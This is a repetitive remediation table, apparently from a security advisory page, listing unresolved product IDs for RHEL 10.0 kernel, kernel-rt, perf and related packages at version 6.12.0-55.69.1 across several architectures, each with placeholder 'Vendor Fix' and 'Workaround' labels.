| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
